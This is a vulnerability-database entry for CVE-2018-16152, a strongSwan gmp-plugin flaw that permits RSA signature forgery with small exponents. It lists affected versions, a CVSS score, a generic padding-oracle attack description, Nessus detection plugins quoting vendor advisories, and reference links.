ID CVE-2018-16152
Summary In verify_emsa_pkcs1_signature() in gmp_rsa_public_key.c in the gmp plugin in strongSwan 4.x and 5.x before 5.7.0, the RSA implementation based on GMP does not reject excess data in the digestAlgorithm.parameters field during PKCS#1 v1.5 signature verification. Consequently, a remote attacker can forge signatures when small public exponents are being used, which could lead to impersonation when only an RSA signature is used for IKEv2 authentication. This is a variant of CVE-2006-4790 and CVE-2014-1568.
References
Vulnerable Configurations
  • StrongSwan strongSwan 4.0.0
    cpe:2.3:a:strongswan:strongswan:4.0.0
  • StrongSwan strongSwan 4.0.1
    cpe:2.3:a:strongswan:strongswan:4.0.1
  • StrongSwan strongSwan 4.0.2
    cpe:2.3:a:strongswan:strongswan:4.0.2
  • StrongSwan strongSwan 4.0.3
    cpe:2.3:a:strongswan:strongswan:4.0.3
  • StrongSwan strongSwan 4.0.4
    cpe:2.3:a:strongswan:strongswan:4.0.4
  • StrongSwan strongSwan 4.0.5
    cpe:2.3:a:strongswan:strongswan:4.0.5
  • StrongSwan strongSwan 4.0.6
    cpe:2.3:a:strongswan:strongswan:4.0.6
  • StrongSwan strongSwan 4.0.7
    cpe:2.3:a:strongswan:strongswan:4.0.7
  • StrongSwan strongSwan 4.1.0
    cpe:2.3:a:strongswan:strongswan:4.1.0
  • StrongSwan strongSwan 4.1.1
    cpe:2.3:a:strongswan:strongswan:4.1.1
  • StrongSwan strongSwan 4.1.2
    cpe:2.3:a:strongswan:strongswan:4.1.2
  • StrongSwan strongSwan 4.1.3
    cpe:2.3:a:strongswan:strongswan:4.1.3
  • StrongSwan strongSwan 4.1.4
    cpe:2.3:a:strongswan:strongswan:4.1.4
  • StrongSwan strongSwan 4.1.5
    cpe:2.3:a:strongswan:strongswan:4.1.5
  • StrongSwan strongSwan 4.1.6
    cpe:2.3:a:strongswan:strongswan:4.1.6
  • StrongSwan strongSwan 4.1.7
    cpe:2.3:a:strongswan:strongswan:4.1.7
  • StrongSwan strongSwan 4.1.8
    cpe:2.3:a:strongswan:strongswan:4.1.8
  • StrongSwan strongSwan 4.1.9
    cpe:2.3:a:strongswan:strongswan:4.1.9
  • StrongSwan strongSwan 4.1.10
    cpe:2.3:a:strongswan:strongswan:4.1.10
  • StrongSwan strongSwan 4.1.11
    cpe:2.3:a:strongswan:strongswan:4.1.11
  • StrongSwan strongSwan 4.2.0
    cpe:2.3:a:strongswan:strongswan:4.2.0
  • StrongSwan strongSwan 4.2.1
    cpe:2.3:a:strongswan:strongswan:4.2.1
  • StrongSwan strongSwan 4.2.2
    cpe:2.3:a:strongswan:strongswan:4.2.2
  • StrongSwan strongSwan 4.2.3
    cpe:2.3:a:strongswan:strongswan:4.2.3
  • StrongSwan strongSwan 4.2.4
    cpe:2.3:a:strongswan:strongswan:4.2.4
  • StrongSwan strongSwan 4.2.5
    cpe:2.3:a:strongswan:strongswan:4.2.5
  • StrongSwan strongSwan 4.2.6
    cpe:2.3:a:strongswan:strongswan:4.2.6
  • StrongSwan strongSwan 4.2.7
    cpe:2.3:a:strongswan:strongswan:4.2.7
  • StrongSwan strongSwan 4.2.8
    cpe:2.3:a:strongswan:strongswan:4.2.8
  • StrongSwan strongSwan 4.2.9
    cpe:2.3:a:strongswan:strongswan:4.2.9
  • StrongSwan strongSwan 4.2.10
    cpe:2.3:a:strongswan:strongswan:4.2.10
  • StrongSwan strongSwan 4.2.11
    cpe:2.3:a:strongswan:strongswan:4.2.11
  • StrongSwan strongSwan 4.2.12
    cpe:2.3:a:strongswan:strongswan:4.2.12
  • StrongSwan strongSwan 4.2.13
    cpe:2.3:a:strongswan:strongswan:4.2.13
  • StrongSwan strongSwan 4.2.14
    cpe:2.3:a:strongswan:strongswan:4.2.14
  • StrongSwan strongSwan 4.2.15
    cpe:2.3:a:strongswan:strongswan:4.2.15
  • StrongSwan strongSwan 4.2.16
    cpe:2.3:a:strongswan:strongswan:4.2.16
  • StrongSwan strongSwan 4.3.0
    cpe:2.3:a:strongswan:strongswan:4.3.0
  • StrongSwan strongSwan 4.3.1
    cpe:2.3:a:strongswan:strongswan:4.3.1
  • StrongSwan strongSwan 4.3.2
    cpe:2.3:a:strongswan:strongswan:4.3.2
  • StrongSwan strongSwan 4.3.3
    cpe:2.3:a:strongswan:strongswan:4.3.3
  • StrongSwan strongSwan 4.3.4
    cpe:2.3:a:strongswan:strongswan:4.3.4
  • StrongSwan 4.3.5
    cpe:2.3:a:strongswan:strongswan:4.3.5
  • StrongSwan 4.3.6
    cpe:2.3:a:strongswan:strongswan:4.3.6
  • StrongSwan 4.3.7
    cpe:2.3:a:strongswan:strongswan:4.3.7
  • StrongSwan 4.4.0
    cpe:2.3:a:strongswan:strongswan:4.4.0
  • StrongSwan strongSwan 4.4.1
    cpe:2.3:a:strongswan:strongswan:4.4.1
  • StrongSwan strongSwan 4.5.0
    cpe:2.3:a:strongswan:strongswan:4.5.0
  • StrongSwan strongSwan 4.5.1
    cpe:2.3:a:strongswan:strongswan:4.5.1
  • StrongSwan strongSwan 4.5.2
    cpe:2.3:a:strongswan:strongswan:4.5.2
  • StrongSwan strongSwan 4.5.3
    cpe:2.3:a:strongswan:strongswan:4.5.3
  • StrongSwan strongSwan 4.6.0
    cpe:2.3:a:strongswan:strongswan:4.6.0
  • StrongSwan strongSwan 4.6.1
    cpe:2.3:a:strongswan:strongswan:4.6.1
  • StrongSwan strongSwan 4.6.2
    cpe:2.3:a:strongswan:strongswan:4.6.2
  • StrongSwan strongSwan 4.6.3
    cpe:2.3:a:strongswan:strongswan:4.6.3
  • StrongSwan 4.6.4
    cpe:2.3:a:strongswan:strongswan:4.6.4
  • StrongSwan 5.0.0
    cpe:2.3:a:strongswan:strongswan:5.0.0
  • StrongSwan 5.0.1
    cpe:2.3:a:strongswan:strongswan:5.0.1
  • StrongSwan 5.0.2
    cpe:2.3:a:strongswan:strongswan:5.0.2
  • StrongSwan 5.0.3
    cpe:2.3:a:strongswan:strongswan:5.0.3
  • StrongSwan 5.0.4
    cpe:2.3:a:strongswan:strongswan:5.0.4
  • StrongSwan strongSwan 5.1.0
    cpe:2.3:a:strongswan:strongswan:5.1.0
  • StrongSwan strongSwan 5.1.1
    cpe:2.3:a:strongswan:strongswan:5.1.1
  • StrongSwan strongSwan 5.1.2
    cpe:2.3:a:strongswan:strongswan:5.1.2
  • StrongSwan strongSwan 5.1.3
    cpe:2.3:a:strongswan:strongswan:5.1.3
  • StrongSwan 5.2.0
    cpe:2.3:a:strongswan:strongswan:5.2.0
  • strongSwan 5.2.1
    cpe:2.3:a:strongswan:strongswan:5.2.1
  • strongSwan 5.2.2
    cpe:2.3:a:strongswan:strongswan:5.2.2
  • strongSwan 5.2.3
    cpe:2.3:a:strongswan:strongswan:5.2.3
  • strongSwan 5.3.0
    cpe:2.3:a:strongswan:strongswan:5.3.0
  • strongSwan 5.3.1
    cpe:2.3:a:strongswan:strongswan:5.3.1
  • StrongSwan strongSwan 5.3.2
    cpe:2.3:a:strongswan:strongswan:5.3.2
  • StrongSwan strongSwan 5.3.3
    cpe:2.3:a:strongswan:strongswan:5.3.3
  • strongSwan 5.3.4
    cpe:2.3:a:strongswan:strongswan:5.3.4
  • strongSwan 5.3.5
    cpe:2.3:a:strongswan:strongswan:5.3.5
  • strongSwan 5.4.0
    cpe:2.3:a:strongswan:strongswan:5.4.0
  • strongSwan 5.5.0
    cpe:2.3:a:strongswan:strongswan:5.5.0
  • strongSwan 5.5.1
    cpe:2.3:a:strongswan:strongswan:5.5.1
  • strongSwan 5.5.2
    cpe:2.3:a:strongswan:strongswan:5.5.2
  • strongSwan 5.5.3
    cpe:2.3:a:strongswan:strongswan:5.5.3
  • strongSwan 5.6.0
    cpe:2.3:a:strongswan:strongswan:5.6.0
  • strongSwan 5.6.1
    cpe:2.3:a:strongswan:strongswan:5.6.1
  • strongSwan 5.6.2
    cpe:2.3:a:strongswan:strongswan:5.6.2
  • strongSwan 5.6.3
    cpe:2.3:a:strongswan:strongswan:5.6.3
  • Debian Linux 8.0 (Jessie)
    cpe:2.3:o:debian:debian_linux:8.0
  • Debian Linux 9.0
    cpe:2.3:o:debian:debian_linux:9.0
  • Canonical Ubuntu Linux 14.04 LTS (Long-Term Support)
    cpe:2.3:o:canonical:ubuntu_linux:14.04:-:-:-:lts
  • Canonical Ubuntu Linux 16.04 LTS (Long-Term Support)
    cpe:2.3:o:canonical:ubuntu_linux:16.04:-:-:-:lts
  • Canonical Ubuntu Linux 18.04 LTS Edition
    cpe:2.3:o:canonical:ubuntu_linux:18.04:-:-:-:lts
CVSS
Base: 5.0
Impact:
Exploitability:
CWE CWE-347
CAPEC
  • Padding Oracle Crypto Attack
    An attacker is able to efficiently decrypt data without knowing the decryption key if a target system leaks data on whether or not a padding error happened while decrypting the ciphertext. A target system that leaks this type of information becomes the padding oracle and an attacker is able to make use of that oracle to efficiently decrypt data without knowing the decryption key by issuing on average 128*b calls to the padding oracle (where b is the number of bytes in the ciphertext block). In addition to performing decryption, an attacker is also able to produce valid ciphertexts (i.e., perform encryption) by using the padding oracle, all without knowing the encryption key. Any cryptosystem can be vulnerable to padding oracle attacks if the encrypted messages are not authenticated to ensure their validity prior to decryption, and then the information about padding error is leaked to the attacker. This attack technique may be used, for instance, to break CAPTCHA systems or decrypt/modify state information stored in client side objects (e.g., hidden fields or cookies). This attack technique is a side-channel attack on the cryptosystem that uses a data leak from an improperly implemented decryption routine to completely subvert the cryptosystem. The one bit of information that tells the attacker whether a padding error during decryption has occurred, in whatever form it comes, is sufficient for the attacker to break the cryptosystem. That bit of information can come in a form of an explicit error message about a padding error, a returned blank page, or even the server taking longer to respond (a timing attack). This attack can be launched cross domain where an attacker is able to use cross-domain information leaks to get the bits of information from the padding oracle from a target system / service with which the victim is communicating. To do so an attacker sends a request containing ciphertext to the target system. Due to the browser's same origin policy, the attacker is not able to see the response directly, but can use cross-domain information leak techniques to still get the information needed (i.e., information on whether or not a padding error has occurred). For instance, this can be done using "img" tag plus the onerror()/onload() events. The attacker's JavaScript can make web browsers to load an image on the target site, and know if the image is loaded or not. This is 1-bit information needed for the padding oracle attack to work: if the image is loaded, then it is valid padding, otherwise it is not.
nessus via4
  • NASL family Ubuntu Local Security Checks
    NASL id UBUNTU_USN-3771-1.NASL
    description It was discovered that strongSwan incorrectly handled IKEv2 key derivation. A remote attacker could possibly use this issue to cause strongSwan to crash, resulting in a denial of service. (CVE-2018-10811) Sze Yiu Chau discovered that strongSwan incorrectly handled parsing OIDs in the gmp plugin. A remote attacker could possibly use this issue to bypass authorization. (CVE-2018-16151) Sze Yiu Chau discovered that strongSwan incorrectly handled certain parameters fields in the gmp plugin. A remote attacker could possibly use this issue to bypass authorization. (CVE-2018-16152) It was discovered that strongSwan incorrectly handled the stroke plugin. A local administrator could use this issue to cause a denial of service, or possibly execute arbitrary code. (CVE-2018-5388). Note that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
    last seen 2019-02-21
    modified 2018-12-01
    plugin id 117805
    published 2018-09-27
    reporter Tenable
    source https://www.tenable.com/plugins/index.php?view=single&id=117805
    title Ubuntu 14.04 LTS / 16.04 LTS / 18.04 LTS : strongswan vulnerabilities (USN-3771-1)
  • NASL family Debian Local Security Checks
    NASL id DEBIAN_DSA-4305.NASL
    description Sze Yiu Chau and his team from Purdue University and The University of Iowa found several issues in the gmp plugin for strongSwan, an IKE/IPsec suite. Problems in the parsing and verification of RSA signatures could lead to a Bleichenbacher-style low-exponent signature forgery in certificates and during IKE authentication. While the gmp plugin doesn't allow arbitrary data after the ASN.1 structure (the original Bleichenbacher attack), the ASN.1 parser is not strict enough and allows data in specific fields inside the ASN.1 structure. Only installations using the gmp plugin are affected (on Debian OpenSSL plugin has priority over GMP one for RSA operations), and only when using keys and certificates (including ones from CAs) using keys with an exponent e = 3, which is usually rare in practice. - CVE-2018-16151 The OID parser in the ASN.1 code in gmp allows any number of random bytes after a valid OID. - CVE-2018-16152 The algorithmIdentifier parser in the ASN.1 code in gmp doesn't enforce a NULL value for the optional parameter which is not used with any PKCS#1 algorithm.
    last seen 2019-02-21
    modified 2018-12-20
    plugin id 117678
    published 2018-09-25
    reporter Tenable
    source https://www.tenable.com/plugins/index.php?view=single&id=117678
    title Debian DSA-4305-1 : strongswan - security update
  • NASL family Gentoo Local Security Checks
    NASL id GENTOO_GLSA-201811-16.NASL
    description The remote host is affected by the vulnerability described in GLSA-201811-16 (strongSwan: Multiple vulnerabilities) Multiple vulnerabilities have been discovered in strongSwan. Please review the CVE identifiers referenced below for details. Impact : A remote attacker could cause a Denial of Service condition or impersonate a user. Workaround : There is no known workaround at this time.
    last seen 2019-02-21
    modified 2018-11-27
    plugin id 119161
    published 2018-11-27
    reporter Tenable
    source https://www.tenable.com/plugins/index.php?view=single&id=119161
    title GLSA-201811-16 : strongSwan: Multiple vulnerabilities
  • NASL family PhotonOS Local Security Checks
    NASL id PHOTONOS_PHSA-2019-1_0-0203_STRONGSWAN.NASL
    description An update of the strongswan package has been released.
    last seen 2019-02-08
    modified 2019-02-07
    plugin id 122019
    published 2019-02-07
    reporter Tenable
    source https://www.tenable.com/plugins/index.php?view=single&id=122019
    title Photon OS 1.0: Strongswan PHSA-2019-1.0-0203
  • NASL family Debian Local Security Checks
    NASL id DEBIAN_DLA-1522.NASL
    description Sze Yiu Chau and his team from Purdue University and The University of Iowa found several security issues in the gmp plugin for strongSwan, an IKE/IPsec suite. CVE-2018-16151 The OID parser in the ASN.1 code in gmp allows any number of random bytes after a valid OID. CVE-2018-16152 The algorithmIdentifier parser in the ASN.1 code in gmp doesn't enforce a NULL value for the optional parameter which is not used with any PKCS#1 algorithm. For Debian 8 'Jessie', these problems have been fixed in version 5.2.1-6+deb8u7. We recommend that you upgrade your strongswan packages. NOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
    last seen 2019-02-21
    modified 2018-12-20
    plugin id 117715
    published 2018-09-27
    reporter Tenable
    source https://www.tenable.com/plugins/index.php?view=single&id=117715
    title Debian DLA-1522-1 : strongswan security update
  • NASL family PhotonOS Local Security Checks
    NASL id PHOTONOS_PHSA-2019-2_0-0125_STRONGSWAN.NASL
    description An update of the strongswan package has been released.
    last seen 2019-02-08
    modified 2019-02-07
    plugin id 122028
    published 2019-02-07
    reporter Tenable
    source https://www.tenable.com/plugins/index.php?view=single&id=122028
    title Photon OS 2.0: Strongswan PHSA-2019-2.0-0125
  • NASL family Fedora Local Security Checks
    NASL id FEDORA_2018-61DF554BB1.NASL
    description Updated to release 5.7.1 Security fix for : - CVE-2018-16151 - CVE-2018-16152 Note that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
    last seen 2019-02-21
    modified 2019-01-03
    plugin id 120469
    published 2019-01-03
    reporter Tenable
    source https://www.tenable.com/plugins/index.php?view=single&id=120469
    title Fedora 28 : strongswan (2018-61df554bb1)
  • NASL family Fedora Local Security Checks
    NASL id FEDORA_2018-9CAA6528D2.NASL
    description Updated to release 5.7.1 Security fix for : - CVE-2018-16151 - CVE-2018-16152 Note that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
    last seen 2019-02-21
    modified 2018-12-20
    plugin id 118123
    published 2018-10-16
    reporter Tenable
    source https://www.tenable.com/plugins/index.php?view=single&id=118123
    title Fedora 27 : strongswan (2018-9caa6528d2)
  • NASL family Fedora Local Security Checks
    NASL id FEDORA_2018-A0D22C2A21.NASL
    description Updated to release 5.7.1 Security fix for : - CVE-2018-16151 - CVE-2018-16152 Note that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
    last seen 2019-02-21
    modified 2019-01-03
    plugin id 120663
    published 2019-01-03
    reporter Tenable
    source https://www.tenable.com/plugins/index.php?view=single&id=120663
    title Fedora 29 : strongswan (2018-a0d22c2a21)
refmap via4
confirm https://www.strongswan.org/blog/2018/09/24/strongswan-vulnerability-(cve-2018-16151,-cve-2018-16152).html
debian DSA-4305
gentoo GLSA-201811-16
mlist [debian-lts-announce] 20180926 [SECURITY] [DLA 1522-1] strongswan security update
ubuntu USN-3771-1
Last major update 26-09-2018 - 17:29
Published 26-09-2018 - 17:29
Last modified 19-12-2018 - 13:49
Back to Top